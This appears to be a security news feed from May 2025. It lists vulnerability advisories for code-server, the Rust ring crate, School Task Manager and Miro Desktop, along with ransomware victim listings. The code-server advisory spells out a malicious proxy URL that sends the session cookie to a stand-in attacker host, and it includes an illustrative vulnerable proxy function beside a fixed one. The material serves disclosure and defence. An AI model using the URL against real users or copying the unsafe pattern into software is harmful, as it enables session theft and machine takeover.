Description: Ransomware Attack Update for the 9th of May 2025
May 9th, 2025 (about 2 months ago)
Description: Summary
A maliciously crafted URL using the proxy subpath can result in the attacker gaining access to the user's session token.
Details
Failure to properly validate the port segment of a proxy request can result in proxying to an arbitrary domain. A malicious URL of the form https://<code-server host>/proxy/user@attacker.example/path, with an "@" in the position where a port number is expected, is proxied to user@attacker.example/path, so the attacker's host receives the request and can exfiltrate the user's session token from it.
Impact
Any user who runs code-server with the built-in proxy enabled and clicks a maliciously crafted link that points at their own code-server instance under /proxy is affected.
Normally this path is used to proxy local ports, but the URL can reference the attacker's domain instead; the connection is then proxied to that domain, and the proxied request carries the user's cookies.
With the session cookie, the attacker can log into code-server and has full access to the machine hosting code-server as the user running code-server.
Patches
Patched versions are v4.99.4 onward.
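To make the mechanism concrete, the following is an added example and not code-server's own code or its patch: a minimal builder for a /proxy/<port>/<rest> route that interpolates the port segment into a loopback target URL unchecked, beside a version that accepts only a decimal, in-range port. The loopback base http://0.0.0.0:<port>, the helper names and the hostname attacker.example are assumptions for illustration.

```javascript
// Added illustration of the advisory's mechanism (assumed route shape,
// not code-server's implementation). A proxy route /proxy/<port>/<rest>
// is meant to forward to a service on a local port. If the <port> segment
// is pasted into the target URL unvalidated, an '@' inside it makes the
// URL parser treat the loopback host as userinfo, and the host becomes
// whatever follows the '@'.

// Split "/proxy/<port>/<rest>" into its parts; null if not a proxy path.
function parseProxyPath(pathname) {
  const m = /^\/proxy\/([^/]+)(\/.*)?$/.exec(pathname);
  if (!m) return null;
  return { port: m[1], rest: m[2] || "/" };
}

// Vulnerable: the port segment goes straight into the target URL.
// "/proxy/user@attacker.example/path" becomes
// http://0.0.0.0:user@attacker.example/path, which the WHATWG URL parser
// reads as username "0.0.0.0", password "user", host "attacker.example".
// A proxy that forwards the browser's cookies to this target sends the
// session cookie to attacker.example.
function buildTargetUnsafe(pathname) {
  const p = parseProxyPath(pathname);
  if (!p) return null;
  return new URL(p.rest, `http://0.0.0.0:${p.port}`);
}

// Hardened: accept only a decimal TCP port in 1..65535 and build the URL
// from the parsed number, so no other character can reach the authority
// section of the target URL.
function buildTargetSafe(pathname) {
  const p = parseProxyPath(pathname);
  if (!p) return null;
  if (!/^\d{1,5}$/.test(p.port)) return null;
  const n = Number(p.port);
  if (n < 1 || n > 65535) return null;
  return new URL(p.rest, `http://0.0.0.0:${n}`);
}

// Constructed sample paths: a legitimate local port and the malicious form.
const samplePaths = ["/proxy/8080/path", "/proxy/user@attacker.example/path"];
for (const path of samplePaths) {
  const u = buildTargetUnsafe(path);
  const s = buildTargetSafe(path);
  console.log(path, "=> unsafe:", u.host, "| safe:", s ? s.host : "rejected");
}
```

The check to carry into any similar proxy route is the hardened one: validate that the segment is a number before it touches the URL, rather than trying to strip "@" or other characters after the fact, since the URL grammar offers more than one way to move the host boundary.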
References
https://github.com/coder/code-server/security/advisories/GHSA-p483-wpfp-42cj
https://github.com/coder/code-server/commit/47d6d3ada5aadef6d221f3d612401eb3dad9299e
https://github.com/coder/code-server/releases/tag/v4.99.4
https://github.com/advisories/GHSA-p483-wpfp-42cj
May 9th, 2025 (about 2 months ago)

Description: A flaw was found in the Rust ring crate. A panic may be triggered when overflow checking is enabled. In the QUIC protocol, an attacker can induce this panic by sending a specially crafted packet; it will also occur unintentionally in about 1 out of every 2**32 packets sent or received.
References
https://nvd.nist.gov/vuln/detail/CVE-2025-4432
https://github.com/briansmith/ring/pull/2447
https://github.com/briansmith/ring/commit/ec2d3cf1d91f148c84e4806b4f0b3c98f6df3b38
https://access.redhat.com/security/cve/CVE-2025-4432
https://bugzilla.redhat.com/show_bug.cgi?id=2350655
https://github.com/briansmith/ring
https://github.com/briansmith/ring/blob/main/RELEASES.md#version-01712-2025-03-05
https://rustsec.org/advisories/RUSTSEC-2025-0009.html
https://github.com/advisories/GHSA-c86p-w88r-qvqr
EPSS Score: 0.13%
May 9th, 2025 (about 2 months ago)

CVE-2024-24142
Description: Sourcecodester School Task Manager 1.0 allows SQL Injection via the 'subject' parameter.
EPSS Score: 7.28% SSVC Exploitation: poc
May 9th, 2025 (about 2 months ago)

CVE-2024-23746
Description: Miro Desktop 0.8.18 on macOS allows local Electron code injection via a complex series of steps that might be usable in some environments (bypass a kTCCServiceSystemPolicyAppBundles requirement via a file copy, an app.app/Contents rename, an asar modification, and a rename back to app.app/Contents).
EPSS Score: 0.35% SSVC Exploitation: poc
May 9th, 2025 (about 2 months ago)
Description: Exposed data from LockBit's affiliate panel includes Bitcoin addresses, private chats with victim organizations, and user information such as credentials.
May 9th, 2025 (about 2 months ago)

Description: Russell Child Development Center is a community-based non-profit organization that serves early childhood programs across 19 counties in Southwest Kansas. The center offers a variety of services including early intervention, targeted case management, and support programs for families and child care providers. The Russell Child Development Center corporate office is located at 2735 N Jennie Barker Rd, Garden City, Kansas, 67846, United States, and the organization has 30 employees. The total amount of leaked data is 215.50 GB.
May 9th, 2025 (about 2 months ago)

Description: Lake Shore Paving (founded in 1998) provides services for excavation, utility, asphalt paving and concrete paving needs. The Lake Shore Paving corporate office is located at 7 Osmer St, Jamestown, New York, 14701, United States, and the company has 19 employees. The total amount of leaked data is 112.30 GB.
May 9th, 2025 (about 2 months ago)
Description: [AI generated] CheckCity.com is a financial services company based in Provo, Utah. It offers a variety of services, including payday loans, cash advances, title loans, and check cashing. It also provides money orders, wire transfers, tax services, and prepaid debit cards. Founded in 1986, CheckCity operates both online and through physical branches. It serves clients across multiple states in the US.
May 9th, 2025 (about 2 months ago)